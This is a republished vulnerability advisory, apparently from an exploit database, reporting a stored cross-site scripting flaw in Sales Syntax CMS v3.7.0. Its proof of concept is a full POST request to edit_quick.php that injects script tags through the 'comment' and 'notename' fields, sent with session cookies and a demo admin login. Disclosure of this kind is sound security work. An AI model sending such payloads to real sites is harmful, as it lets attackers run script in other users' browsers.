Sales Syntax CMS - Stored Cross-Site Scripting
Sales Syntax CMS v3.7.0 存在存储型跨站脚本(XSS)漏洞,攻击者可通过 POST 请求中的 comment 参数注入恶意脚本,在 "Edit Canned Responses" 标签处触发攻击。 2025-9-10 19:59:47 Author: cxsecurity.com(查看原文) 阅读量:2 收藏

# Exploit Title: Sales Syntax CMS - Stored Cross-Site Scripting # Google Dork: N/A # Date: 2025-09-06 [YYYY/MM/DD] # Exploit Author: Erdinç ODABAŞ # Vendor Homepage: www.salessyntax.net # Vulnerable Software --> [ https://www.salessyntax.net/salessyntax-3.7.0.zip ] # Affected Version: [ v3.7.0 ] # CVE-ID: N/A # Tested on: Windows 10 # Vulnerable Parameter Type: POST # Vulnerable Parameter: comment # Attack Pattern: <script>alert("Erdinc")</script> # Description Allows it to run a Cross-Site Scripting by saving a new title from the "Edit Canned Responses" tab. # Proof of Concepts: POST /Sales_Syntaxrr6lw68y2d/edit_quick.php HTTP/1.1 Host: 127.0.0.1 Cookie: AEFCookies1526[aefsid]=55imd0pwmt8zvnahftzwuxanrnq0kcav; demo_523=%7B%22sid%22%3A523%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FCotontimx82untgbn%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2F127.0.0.1%5C%2FCotontimx82untgbn%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22mx82untgbn%22%7D; cslhOPERATOR=fe8e5a645d3ba40dd9c8b0439314d338 Content-Length: 216 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="139", "Not;A=Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Accept-Language: tr-TR,tr;q=0.9 Origin: https://127.0.0.1 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: frame Referer: https://127.0.0.1/Sales_Syntaxrr6lw68y2d/edit_quick.php?action=edit&typeof= Accept-Encoding: gzip, deflate, br Priority: u=0, i Connection: keep-alive typing=no&user_id=1&alt_what=&typeof=&timeof=20250906222448&editid=0&notename=%3Cscript%3Ealert%28%27Erdinc%27%29%3C%2Fscript%3E&visiblity=Private&comment=%3Cscript%3Ealert%28%27Erdinc2%27%29%3C%2Fscript%3E&what=SAVE

References:

# Vendor Homepage: www.salessyntax.net # Vulnerable Software --> [

https://www.salessyntax.net/salessyntax-3.7.0.zip

]




 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025090004
如有侵权请联系:admin#unsafe.sh